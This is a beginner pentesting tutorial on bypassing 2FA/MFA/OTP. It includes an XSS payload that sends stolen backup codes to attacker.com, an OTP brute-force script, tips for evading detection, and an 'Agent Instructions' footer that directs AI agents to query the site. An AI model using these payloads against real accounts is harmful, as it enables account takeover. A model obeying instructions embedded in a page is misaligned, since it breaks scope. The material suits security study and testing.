# 2FA/MFA/OTP Bypass {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} Exploiting 2FA, MFA, and OTP bypasses can be complex, as it depends on the specific security measures of the target system. Below, we’ll break down the steps for various techniques, written for beginners to understand. We’ll also include an unexpected detail: some systems allow attackers to generate OTPs themselves if the construction is flawed, which isn’t always obvious. ## Direct Endpoint Access **What to Do:** Try accessing the endpoint after 2FA directly, like skipping to a protected page. Use **cURL** or **Postman** to send a request directly to endpoints **after login but before MFA completion**. ```bash curl -X GET "https://target.com/api/user/dashboard" -H "Authorization: Bearer " ``` If you can access the dashboard **without** completing MFA, the application is vulnerable. *** ## Token-Based Exploits ### **1) Token Reuse** Use old tokens again if the system doesn’t invalidate them. 1. **Capture a valid MFA token** using **Burp Suite** or a proxy tool. 2. **Log in and complete MFA** once while monitoring the request. 3. **Save the token** sent to the server (e.g., `X-MFA-Token: 123456`). 4. **Log out and try logging in again**, but instead of entering a new token, replay the old one. 5. If the system allows it, **MFA is bypassed!** ```bash curl -X POST "https://target.com/api/verify_mfa" -H "Authorization: Bearer " -H "X-MFA-Token: 123456" ``` ### **2) Unused Tokens** Use tokens that weren’t used yet. 1. **Request multiple MFA codes** but do not use them all. 2. **Save an unused token** (e.g., if three codes are generated, keep the last one). 3. **Try logging in later** using the saved token. 4. If the system accepts it, **MFA is bypassed!** ```bash curl -X POST "https://target.com/api/verify_mfa" -H "Authorization: Bearer " -H "X-MFA-Token: 789012" ``` ### **3) Token Exposure** Look for tokens in responses. 1. **Use a proxy (Burp Suite, mitmproxy) to intercept requests.** 2. **Look for API responses** containing sensitive information. 3. **Find and extract the MFA token.** 4. **Use the token** to bypass the verification step. A response from an API may contain: ```json { "status": "success", "mfa_token": "654321" } ``` An attacker can **reuse this token** for MFA verification. **JavaScript Exposure Example:** Check for exposed tokens in **Developer Tools (F12 → Console)**: ```javascript console.log(window.localStorage.getItem("mfa_token")); ``` If the MFA token is stored in local storage, an attacker can extract and reuse it. *** ## Account and Session Tricks ### **1) Verification Link** Use email links from account creation to access without 2FA. 1. **Create a new account** and capture the verification link sent to your email. 2. **Log out** before completing the MFA setup. 3. **Use the verification link** in an **incognito/private** browser session. 4. **Check if the account gets verified** and logs in **without MFA.** A verification email contains: ``` https://target.com/verify?token=abcdef123456 ``` If clicking this link **logs you in directly without requiring MFA**, then MFA enforcement is weak. ### **2) Session Manipulation** Use your session’s 2FA state to access another account. 1. **Log in to two different accounts in the same browser.** 2. **Complete MFA for one account.** 3. **Switch to the other account (via cookie or session manipulation).** 4. **Check if MFA is skipped** when switching accounts. **Example Attack:** * Open **Account A** (without MFA completed). * Open **Account B** in another tab and complete MFA. * Switch back to **Account A** and check if you now have access **without completing MFA.** ### **3) Password Reset** Reset the password and see if 2FA is bypassed. 1. **Request a password reset** for an account that has MFA enabled. 2. **Reset the password** using the provided link. 3. **Log in with the new password** and check if the system asks for MFA. 4. If it does **not** require MFA, then the system is vulnerable. **Example Attack:** A password reset email contains: ``` https://target.com/reset-password?token=xyz789 ``` After resetting the password, if the attacker logs in and **MFA is not required**, they have bypassed it. *** ## Advanced Techniques ### **1) Trusted Platforms** Hack into linked accounts like Google to bypass 2FA. Some applications allow users to log in via **OAuth (Google, Facebook, Microsoft, etc.)** instead of requiring MFA. If an attacker compromises a linked account, they can bypass MFA entirely. **Steps to Exploit:** 1. **Find an account that allows login via a trusted platform** (e.g., “Sign in with Google”). 2. **Compromise the Google/Facebook/Microsoft account** via phishing, leaked credentials, or session hijacking. 3. **Use the compromised account to log in** to the target service. 4. **Check if MFA is skipped** due to trusted platform authentication. ### **2) Brute Force** Try codes repeatedly, especially if no rate limits exist. 1. Identify an MFA field that **does not lock out users** after multiple failed attempts. 2. Automate guessing with tools like **Burp Intruder, Hydra, or custom scripts.** 3. If the system allows resending codes, request a new code repeatedly to reset limits. 4. Use **slow brute-force attacks** (e.g., trying one code per minute to evade detection). **Example Brute Force Script (Python)** ```python import requests url = "https://target.com/api/verify_mfa" headers = {"Authorization": "Bearer "} for code in range(100000, 999999): # 6-digit code brute force data = {"mfa_code": str(code)} response = requests.post(url, headers=headers, json=data) if "success" in response.text: print(f"Valid MFA Code: {code}") break ``` ### **3) Race Conditions** Exploit timing issues in the system. 1. Identify an action that requires MFA (e.g., login or enabling 2FA). 2. Open **two or more requests in parallel** (e.g., in Burp Suite’s **Turbo Intruder**). 3. Send one request to verify MFA and another to access the system before MFA is fully processed. 4. If the system fails to enforce MFA correctly, **access is granted without full verification.** **Example Attack Scenario:** * One request verifies MFA (`/verify_mfa`). * Another request tries accessing a protected page (`/dashboard`). * If the second request **bypasses MFA**, the system has a race condition. ### **4) CSRF/**[**Clickjacking**](https://www.verylazytech.com/pentesting-web/clickjacking) Trick users into disabling 2FA. 1. **Find the request** that disables MFA (e.g., `POST /disable_mfa`). 2. **Craft a malicious link** that submits this request when clicked. 3. **Trick the target user** into clicking the link while logged in. 4. If successful, the target’s MFA is disabled **without their consent.** **Example CSRF Exploit (HTML Page):** ```html
``` If the user is logged in and clicks the button, their MFA is disabled. ### **5) Remember Me Exploits** Guess cookies or fake IP addresses. 1. **Analyze the authentication cookies** after enabling “Remember Me.” 2. **Check if the cookie contains predictable or unencrypted tokens.** 3. Try **reusing the cookie** from another device to bypass MFA. 4. If the system uses **IP-based trust**, spoof the IP using the `X-Forwarded-For` header. **Example Exploit (Setting X-Forwarded-For Header in Curl):** ```bash curl -X GET "https://target.com/dashboard" -H "Cookie: remember_me=abcdef123456" -H "X-Forwarded-For: 192.168.1.100" ``` *** ## Legacy and Backup Issues Many systems have legacy components or backup mechanisms that introduce MFA weaknesses. Attackers can exploit **older versions, backup codes, and previous sessions** to bypass MFA entirely. ### **1) Older Versions** Check subdomains or APIs for outdated, vulnerable setups. 1. **Find outdated versions** by scanning subdomains and API endpoints. * Use **tools like Subfinder, Amass, or Wayback Machine** to locate old versions. * Example: `legacy.target.com`, `api.v1.target.com/login`. 2. **Check if MFA is missing** or has known security flaws. 3. **Attempt login via the old version** to bypass MFA enforcement. **Example Subdomain Scan (Using Subfinder & Nmap):** ```bash subfinder -d target.com | tee subdomains.txt nmap -p 443 --script http-title -iL subdomains.txt ``` If an older version exists, **try logging in without MFA.** ### 2) **Backup Codes** Steal or generate backup codes if access controls are weak. 1. **Look for security misconfigurations** that expose backup codes: * **CORS misconfigurations**: Check if an attacker-controlled website can read API responses. * **XSS vulnerabilities**: Inject JavaScript to steal codes. * **Unprotected API endpoints**: Check `/user/backup_codes` or similar. 2. **Extract backup codes** using one of the found vulnerabilities. 3. **Use the stolen codes** to authenticate and bypass MFA. **Example XSS Payload to Steal Backup Codes:** ```javascript fetch("https://target.com/api/backup_codes") .then(response => response.text()) .then(data => fetch("https://attacker.com/steal?codes=" + encodeURIComponent(data))); ``` If successful, the attacker now has valid **MFA bypass codes.** ### 3) **Previous Sessions** Use old sessions if not terminated after 2FA setup. 1. **Log in before MFA is enabled.** 2. **Save session cookies** or authentication tokens. 3. **Ask the user to enable MFA** or wait for them to do it. 4. **Reuse the old session** to access the account **without completing MFA.** **Example: Stealing Session Tokens with JavaScript** ```javascript console.log(document.cookie); ``` If a valid session cookie exists, the attacker can **reuse it to bypass MFA.** *** ## Additional Exploits ### 1) **Information Disclosure** Look for sensitive data on 2FA pages. 1. **Visit the 2FA page** and inspect the page source or network requests. 2. Look for **email addresses, phone numbers, security questions, or partial OTPs.** 3. Use this leaked data to **phish the user, brute-force the OTP, or reset the password.** **Example: Finding Leaked Data in Network Requests (Using Burp Suite)** 1. Enable **Burp Proxy** and navigate to the 2FA page. 2. Look for **server responses** containing hints like: * `Your OTP starts with 123***` * `Your registered email: user@example.com` * `Last four digits of your phone: 5678` 3. Use this data to **guess OTPs, reset passwords, or craft social engineering attacks.** ### 2) **Password Reset Bypassing 2FA** Reset password after 2FA setup and check access. 1. **Initiate a password reset** for the target account. 2. **Change the password** using the reset link. 3. **Log in with the new password** and check if the system prompts for 2FA. 4. If MFA is **not required after the reset**, access is granted without it. **Example Attack Workflow:** 1. **Attacker requests a password reset** for `victim@example.com`. 2. If they have access to the victim’s email, **reset the password.** 3. **Log in using the new password** and check if MFA is enforced. 4. If the system skips MFA, **access is fully compromised.** ### 3) **Decoy Requests** Send fake requests to hide brute force attempts. 1. **Identify the MFA endpoint** used for OTP verification. 2. **Automate attack requests** while sending normal traffic (e.g., logins, page views). 3. If successful, the brute-force attack remains **undetected** by security mechanisms. **Example Decoy Attack Using Burp Intruder:** 1. Set up an attack in **Burp Suite’s Intruder**. 2. Use **payload lists** that mix: * **Real login requests** (to appear as a normal user). * **Brute force attempts** (to guess the OTP). 3. Monitor **responses** to detect valid OTPs. ### 4) **OTP Construction Errors** Generate OTPs yourself if based on known data. 1. **Analyze how OTPs are generated** (e.g., timestamps, user ID, sequential numbers). 2. **Look for patterns** by requesting multiple OTPs in a short period. 3. **Recreate the OTP generation logic** to predict future OTPs. **Example: Predicting OTPs Based on Timestamps** 1. If the OTP format is `YYYYMMDDHHMM + UserID`, an attacker can **reconstruct** it. 2. Generate the OTP using a simple Python script: ```python from datetime import datetime user_id = "1234" otp = datetime.now().strftime("%Y%m%d%H%M") + user_id print(f"Generated OTP: {otp}") ``` 3. If the system **does not randomize OTPs**, an attacker can **generate valid OTPs without interception.** *** {% hint style="success" %} Learn & practice [**For the OSCP.**](https://shop.verylazytech.com)
Support VeryLazyTech 🎉 * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/pentesting-web/2fa-mfa-otp-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.